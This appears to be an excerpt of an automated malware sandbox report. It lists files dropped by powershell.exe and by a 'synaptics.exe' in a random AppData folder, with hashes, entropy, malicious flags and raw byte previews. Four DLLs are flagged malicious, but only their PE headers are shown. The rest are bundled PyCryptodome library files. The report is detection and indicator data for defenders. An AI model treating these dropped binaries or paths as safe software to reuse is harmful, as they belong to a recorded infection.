                                                                                                                                                                                                            SHA-256:DCDCB291170D5F31562B79437660E4D94A793FB77EFA0C2922CE6DE02A83B6AF
                                                                                                                                                                                                            SHA-512:C08DA05FAF0A6B771ABC014E981E9B85BD3880EC29E91E815F9297E3D6B9487562150931B60688B443EF7223E7C9D8899F1F1985CBD58403BABEF4E986A14D6F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....g.d...Z.d.d...Z.d.S.).)...HMACZ.MD2Z.MD4..MD5Z.RIPEMD160..SHA1..SHA224..SHA256..SHA384..SHA512..SHA3_224..SHA3_256..SHA3_384..SHA3_512Z.CMACZ.Poly1305Z.cSHAKE128Z.cSHAKE256Z.KMAC128Z.KMAC256Z.TupleHash128Z.TupleHash256Z.KangarooTwelveZ.TurboSHAKE128Z.TurboSHAKE256c....................C...sT...|.....}.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r<d.d.l.m.}...|.....S.|.d.v.rJd.d.l.m.}...|.....S.|.d.v.rZd.d.l.m.}...|.j.d.d...S.|.d.v.rjd.d.l.m.}...|.j.d.d...S.|.d.v.rxd.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.t.d.t.|.........).zKReturn a new hash instance, based on its name or. on its ASN.1 Object ID).z.1.3.14.3.2.26r....z.SHA-1.....).r....).z.2.16.840.1.101.3.4.2.4r....z.SHA-224).r....).z.2.16.840.1.101.3.4.2.1r....z.SHA-256).r....).z.2.16.840.1.101.3.4.2.2r....z.SHA-384).r....).z.2.16.840.1.101.3.4.2.3r....z.SHA-512).r....).z.2.16.840
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                            Entropy (8bit):5.411377524360766
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:z18MVPEzvIDVhTQWejOJbib5UuvGZDO8pAMVnjIN:xygjT4jUbibaZJBnjS
                                                                                                                                                                                                            MD5:499AD70303A089D1A5342E50B7001A1F
                                                                                                                                                                                                            SHA1:740B1880136A0A44C44EDEBFFC6A565C4035E4B4
                                                                                                                                                                                                            SHA-256:30492130BD8AF46387653524152ECC035E41CA67D67038C80F27065D90B35A3D
                                                                                                                                                                                                            SHA-512:36E5E76A9C34F6C743A678FC695CAABACFC5287DD03DCB2E54AFFA8E6B15CA9558B8342B2ABDECEF2780162C55E0976AAD8C750B47573FEF3EF1CE533353EF28
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X.Q.6.Q.6.Q.6.X..U.6...7.S.6...7.R.6.Q.7.p.6...3.Z.6...2.[.6...5.P.6..>.P.6..6.P.6....P.6..4.P.6.RichQ.6.................PE..L...Y..f...........!................N........0...............................p............@..........................4......h5..d....P.......................`..\....0...............................0..@............0..t............................text............................... ..`.rdata.......0......................@..@.data........@......."..............@....rsrc........P.......$..............@..@.reloc..\....`.......&..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                            Entropy (8bit):5.416405172158358
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:tjtPEunQ849hHwZjOlmGWThTCL5ljBMVn7IN:BQ7HojyOTheljon7S
                                                                                                                                                                                                            MD5:A475D54DE60423F2B98AAB662F886474
                                                                                                                                                                                                            SHA1:EE4F7E0049A40CA4F618181D3344EE98F743272D
                                                                                                                                                                                                            SHA-256:4BF9A9DE56D840EBD6DAFD7E92047A69416B156D984A89D61C59B9F51FC80703
                                                                                                                                                                                                            SHA-512:B244A3F86BB024D0E4D236D041D8CBBA94734EAC769A7ABB41CDDBF8029CB0D7C69651D32E88AB2B744FD4F9FB9F424B4562016518CFC73C9053368B85B48A43
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.%.=}K.=}K.=}K.4...9}K.o.J.?}K.v.J.>}K.=}J..}K.o.N.6}K.o.O.7}K.o.H.>}K...C.<}K...K.<}K.....<}K...I.<}K.Rich=}K.................PE..L...Y..f...........!................N........0...............................p............@..........................4......85..d....P.......................`..H....0...............................0..@............0..t............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..H....`.......(..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                            Entropy (8bit):5.694060079029244
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:AivsOdbMjTWksnJ+MWi68KtH5241q22L+nqR:ldKWksJ+s2Hk41+oqR
                                                                                                                                                                                                            MD5:E42395503D2866D7253B8BCF0DD015AA
                                                                                                                                                                                                            SHA1:78187FDD1A500F27415F8CBB6F801BAC4C129540
                                                                                                                                                                                                            SHA-256:9FE0DDBBCCBD90C6014DDD5F9F87227D0EB7356F92877B9E122299B7B9314123
                                                                                                                                                                                                            SHA-512:30159C8A2530CE082620809D48FADEC5D510D631E5D81D62BDC00CB9F008E71748F275480FCCB9FAC455D6DAF84F2BD8C29137EE381016625C26B3A37E45F982
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...X..f...........!.....&..........N........@............................................@..........................E......tF..d....`.......................p......pA...............................A..@............@..|............................text....$.......&.................. ..`.rdata.......@.......*..............@..@.data... ....P.......4..............@....rsrc........`.......6..............@..@.reloc.......p.......8..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                            Entropy (8bit):5.545860351291034
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:FottPE/lvR/ShZUGkjOEFJJxmNaUT89pAsfG5ZAMVnaKENl:xl5MZAjpFJJmOpAsfG5ZrnaKO
                                                                                                                                                                                                            MD5:82101933C705D85BC1819C2BE921E7AF
                                                                                                                                                                                                            SHA1:C5CC7C139E6918EB667E3950D3FB3376790195FA
                                                                                                                                                                                                            SHA-256:82E68C86B8D9BC6543B6E4632BCF53D47107E2B0A9D1A54C2A2DB0F76CDAB6E2
                                                                                                                                                                                                            SHA-512:D12AC6FBE76337C2168FF74782784BDB5600AAFFC1074986D8F7E9DB0F16CE23899AC0DADC217F79D5BAE9CB1DE4F788251496D7DB1AAB4AE74DEE6B9C59F391
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...C...C...C......C..B...C..B...C...B..C..F...C..G...C..@...C.?.K...C.?.C...C.?....C.?.A...C.Rich..C.................PE..L...Y..f...........!................N........0...............................p............@..........................4......x5..d....P.......................`..x....0...............................0..@............0..|............................text...:........................... ..`.rdata.......0......."..............@..@.data...8....@.......,..............@....rsrc........P......................@..@.reloc..x....`.......0..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6550
                                                                                                                                                                                                            Entropy (8bit):4.889437799325704
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Nqrskrs9t3q/IQ14i44sZ3x6Bki1DC/imkL:krskrs9VqcVYDt
                                                                                                                                                                                                            MD5:C1D439DDBFB7743AB178FFC1860B3C49
                                                                                                                                                                                                            SHA1:E7036F22D605E27B82BDD441DB1450D8E203E1F7
                                                                                                                                                                                                            SHA-256:25255524B26D401F859A162E6271277370F87F2AD42B94BFA27FA98BF15536B7
                                                                                                                                                                                                            SHA-512:85255ABE9BAAEB7FF7ECF4A6790D0B0F6DE3FB2BB0EA5B46BD3FBCF0C167C8E1F25EAEFB45B3BD94F1F22225D4F15144C1236A43403F700D0CB9C28DD8E33EE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):513
                                                                                                                                                                                                            Entropy (8bit):4.65254840298011
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY3AJ1ApWaN5hFeLBaFeLsQwWh72CX5AJaNi4Y:1REcT34A1N56Vp7h71GENiL
                                                                                                                                                                                                            MD5:650178B2B4C1BBE35CB633D193929B0B
                                                                                                                                                                                                            SHA1:08A93F8C458ED63BB136821EF52ADF04B70C02A8
                                                                                                                                                                                                            SHA-256:996DE23B6A41D7158B3C0DD8B3DE5DE532F6953706640866CBE19243A882F3A3
                                                                                                                                                                                                            SHA-512:628B50274BDFA31ABCA9D06A433C493C0953C3F8BBB4949BC83EBF370F383F182D80DAF12850388F0B0EB0D989A6CA3E34329CFF9FB8051F4E649DA6F47B8C3E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class cSHAKE_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. function: Optional[bytes] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> cSHAKE_XOF: ..... def read(self, length: int) -> bytes: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2258
                                                                                                                                                                                                            Entropy (8bit):5.32151039741095
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+f+dywQWVfxMxC4GIAacQWVa:MMDqrYJALrYJHdt3EHGuIWK4mWVJMQEL
                                                                                                                                                                                                            MD5:9595C708A747BEBEC78D587B98118FA7
                                                                                                                                                                                                            SHA1:A007C6E687D054CFD418D12399C8424116171290
                                                                                                                                                                                                            SHA-256:32810B278FB43848BEDBF75D04AFC4C081D544BC512FEB2CE119ED010301C964
                                                                                                                                                                                                            SHA-512:7514E8613909021A4E7F9F5D61E0C43822CD4021B21566528DA241E9C30B5DB72875AF4AE1A3763563E464875AD400D8CAC3DD124C88516CE4577C618CB8E8D0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):239
                                                                                                                                                                                                            Entropy (8bit):5.024092138608156
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:1REYBXy1+txtQORyoczrIY3MTDyJaNyRD4JRQ:1REYBC+t8FHvIY3YyJaNi4Y
                                                                                                                                                                                                            MD5:20ADE99CAEE7A7470D7F06423C91497F
                                                                                                                                                                                                            SHA1:6DDBD7AC33D5777F69B03C9FC201872959DC7C50
                                                                                                                                                                                                            SHA-256:C4B4B0E07985F4C8338D8ABF9803AC1A46F8D1D579B237E207D06D47D1199C18
                                                                                                                                                                                                            SHA-512:A10381306BC87E08F780C199DAD52473288319E8EAD9C50C49ABEC1D3257EF783B954F41D5E4EB4F551CADB219CC67153FBD9FA454CC724541C06510B3B10892
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....from Crypto.Hash.cSHAKE128 import cSHAKE_XOF....Buffer = Union[bytes, bytearray, memoryview]....def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7724
                                                                                                                                                                                                            Entropy (8bit):4.640445445125216
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIPqg9Ss8J8lixIVmkO/YZ3RUaIDrFX2dlPcQ:4qrskrs9t3q/I2gnli7kO/YBiMUQ
                                                                                                                                                                                                            MD5:EC2B85AAC10E4BEE0F1D2920F7B198E9
                                                                                                                                                                                                            SHA1:1C01AE68A7B76914047BD63EED135F94FA218D76
                                                                                                                                                                                                            SHA-256:E2B3E86D48CA669585E69F0320653E8D7712144BB31548C4D451E957C76B2CB6
                                                                                                                                                                                                            SHA-512:1C837AA8479AB17022CB4ABBC59DFB7A279272B90027A97F036987748885AB1C3157BB622BE03D9A6C74AC01ED6339349F15548A778EAFB72B52F35C03AE68B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):764
                                                                                                                                                                                                            Entropy (8bit):4.362163899247177
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                                                                                            MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                                                                                            SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                                                                                            SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                                                                                            SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4554
                                                                                                                                                                                                            Entropy (8bit):5.782560603617485
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:IJClXflwfEc4b6mdKEHSjZtJ4uoJZ/jWR8I4wqAAS4IILLgPT:IJCffv6moHZtJ4uOjO8I4wqAATIILEL
                                                                                                                                                                                                            MD5:B911E2A6BAD8533D874993159F672541
                                                                                                                                                                                                            SHA1:3D0C8BFE400522A66BE171A06E9AE5FC3F5F8B90
                                                                                                                                                                                                            SHA-256:D3A96EE7C9688406F8EC918D768BFD3F69E3630A0659D93F2FA76C6BEF0ABC09
                                                                                                                                                                                                            SHA-512:7D2D7BA32346C9E702C2EA3F81AEAD3E18191A229CFD4C113C7C93B36E2908E85C2190DDC62BDD9DEE6746927A658DA4185AE11B3E9D32C5664E87207B43D1D1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...encode..decode.....N)...a2b_base64..b2a_base64..hexlify..unhexlify)...MD5)...pad..unpad)...DES..DES3..AES)...PBKDF1)...get_random_bytes)...tobytes..tostrc........................s....|.d.u.r.t.}.d.|...}.|.rB|.d...}.t.|.|.d.d.t...}.|.t.|.|...|.d.d.t...7.}.t...|.t.j.|...}.|.d.t.t.|...........7.}.|...t...|.j.......n.|.d.u.rJt.d.......f.d.d...t.d.t.....d...D...}.|.d...|...7.}.|.d.|...7.}.|.S.).a4...Encode a piece of binary data into PEM format... Args:. data (byte string):. The piece of binary data to encode.. marker (string):. The marker for the PEM block (e.g. "PUBLIC KEY").. Note that there is no official master list for all allowed markers.. Still, you can refer to the OpenSSL_ source code.. passphrase (byte string):. If given,
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.102517034841878
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/zwO/lGptBlxnzgmgudWEJDkzzXqIt+kiE2J5dj/a6iVWrz4ixikcTgf:y/M7pznzgmgSW+BIwkn23h/a/ArMAy+
                                                                                                                                                                                                            MD5:9B601A7F2430B3CC10F8E627E947FBC8
                                                                                                                                                                                                            SHA1:45D37F365BB2F896C71D52BCAA848DC3BBB31E4B
                                                                                                                                                                                                            SHA-256:D3B4D88586CEBDAA3B98B7F503E31FD79C003604184FB3C6B5BE70EB84006E95
                                                                                                                                                                                                            SHA-512:B9A55B3F3651C0BEEF50C47A57A9EC8489AFC9EBFA8D2CE67C3766E1062B380B6841A071FD6AB734586A9610E792F6F3C6639380AA7B8DA6696F0E30568B81A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g#........................@...s....d.d.g.Z.d.S.)...PEM..PKCS8N)...__all__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\IO\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):642
                                                                                                                                                                                                            Entropy (8bit):5.530040912669372
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CG1N7ZF90SSj9kEiuMbSSLvZHLspPvZHLOkvZHLZlyfsnT+5ggD:bPcjIbSSLvZoFvZ5vZKfK657
                                                                                                                                                                                                            MD5:CAE375DBF1DC68354D65B0181F6D3B60
                                                                                                                                                                                                            SHA1:284AA93980CA5F2DDBDEA7DB8EB69381267BC9A5
                                                                                                                                                                                                            SHA-256:4E8757B4C382EF8DDAD847F4E5ECC9BA6A89274FA1F013314ADAAE1594E11DCB
                                                                                                                                                                                                            SHA-512:AE8FC9FCA02BF051436251BC23BD673B26176791653D216EAE09FD8A11B2E6E2F9471D3F619C0660424C44D002EC48DE2C07FF0005E8D37B483F702E3F994467
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gk........................@...s....d.g.Z.d.d.l.Z.z.e...d...r.e.....d.d.l.m.Z...d.d.l.m.Z...W.d.S...e.e.e.f.yN......z.d.d.l.m.Z...d.d.l.m.Z...W.Y.d.S...e.e.f.yM......d.d.l.m.Z...i.Z.Y.Y.d.S.w.w.)...Integer.....NZ.PYCRYPTODOME_DISABLE_GMP)...IntegerGMP)...implementation)...IntegerCustom)...IntegerNative)...__all__..os..getenv..ImportErrorZ.Crypto.Math._IntegerGMPr....r....r....Z._implementation..OSError..AttributeErrorZ.Crypto.Math._IntegerCustomr....Z.Crypto.Math._IntegerNativer......r....r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Math\Numbers.py..<module>....s ...................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7453
                                                                                                                                                                                                            Entropy (8bit):5.520144073570933
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RfN8ODJylGU8lODJq3D6Gd5+zbXQO5qcUd:R4c3OGdmtW
                                                                                                                                                                                                            MD5:E9659636A79B322AAA8E303569E76284
                                                                                                                                                                                                            SHA1:AC461609CA725FEA929AAEBEA336FA45A1EBCD6F
                                                                                                                                                                                                            SHA-256:9AB495CB259A383FD4D6B1C81DA071CF9ABAEB15247217D1D508823E554CC6F7
                                                                                                                                                                                                            SHA-512:F77CD2AA6BF43C9EF4FEB53EA47F1EE36BCE623D42DC9D49F2277209F03FB6A1BE31D4331F7F15894E9D1961DAA69913D79C98405A936D01B306489CB0F72A09
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.-.......................@...s|...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d.d...Z.d.d...Z.d.d.l.m.Z...e.e.d.d.......Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).zHFunctions to create and test prime numbers...:undocumented: __package__......)...Random)...Integer)...iter_range.....Nc....................C...s<...t.|.t...s.t.|...}.|.d.v.r.t.S.|.....r.t.S.t.d...}.t.|.d.....}.|.d.u.r(t.....j.}.t.|...}.d.}.|.....r>|.d.L.}.|.d.7.}.|.....s2t.|...D.]Y}.d.}.|.|.|.f.v.rlt.j.d.|.d...|.d...}.d.|.....k.rc|.d...k.sfJ.....J...|.|.|.f.v.sLt.|.|.|...}.|.|.|.f.v.ryqBt.d.|...D.].}.t.|.d.|...}.|.|.k.r...n.|.|.k.r.t.........S.q~t.....S.qBt.S.).a:...Perform a Miller-Rabin primality test on an integer... The test is specified in Section C.3.1 of `FIPS PUB 186-4`__... :Parameters:. candidate : integer. The number to test for primality.. iterations : integer. The maximum number of iterations to perform before. declaring a candidate a probable prime.. randfunc
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11454
                                                                                                                                                                                                            Entropy (8bit):4.987429979141811
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Tj5Panvqjgi/xVcz2QRUtIs3J3Aqqk0ruPuRfNob3l8kKlzC2WrUkvh:TjMvqjgEVcz2QCtIs3J3AqJZb36kK5Ct
                                                                                                                                                                                                            MD5:CCD8D69628FD7937624DCC2656CB80DC
                                                                                                                                                                                                            SHA1:E33311D3838381D700419F598876D7DEDEBB1DC6
                                                                                                                                                                                                            SHA-256:E14EE32CD4BFFFB802BD055C6D00DEB023C87E848D7C39A3B5A65BE340981B2C
                                                                                                                                                                                                            SHA-512:B7C0A790EA598FC770727A4538FE15048DE001924603EFAC0382B9C7EB5EF1EDC22C5C96B70F738B075470F424491C78B6262672E17AE8E64DFB6A5A2E9217FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.-.......................@...s@...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N)...iter_range..bord..bchr..ABC)...Randomc....................@...s....e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.dhd.d.....Z.e.e.j.did.d.......Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d ....Z.e.j.d!d"....Z.e.j.d#d$....Z.e.j.d%d&....Z.e.j.djd(d)....Z.e.j.djd*d+....Z.e.j.d,d-....Z.e.j.djd.d/....Z.e.j.d0d1....Z.e.j.d2d3....Z.e.j.d4d5....Z.e.j.d6d7....Z e.j.d8d9....Z!e.j.d:d;....Z"e.j.d<d=....Z#e.j.d>d?....Z$e.j.d@dA....Z%e.j.dBdC....Z&e.j.dDdE....Z'e.j.dFdG....Z(e.j.dHdI....Z)e.j.dJdK....Z*e.j.dLdM....Z+e.j.dNdO....Z,e.j.dPdQ....Z-e.j.dRdS....Z.e.j.dTdU....Z/e.j.dVdW....Z0e.j.dXdY....Z1e.j.dZd[....Z2e.j.d\d]....Z3e.e.j.d^d_......Z4e.d`da....Z5e6dbdc....Z7e6ddde....Z8e.e.j.dfdg......Z9d'S.)k..IntegerBasec....................C........d.S...N......selfr....r.....UC:\Us
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
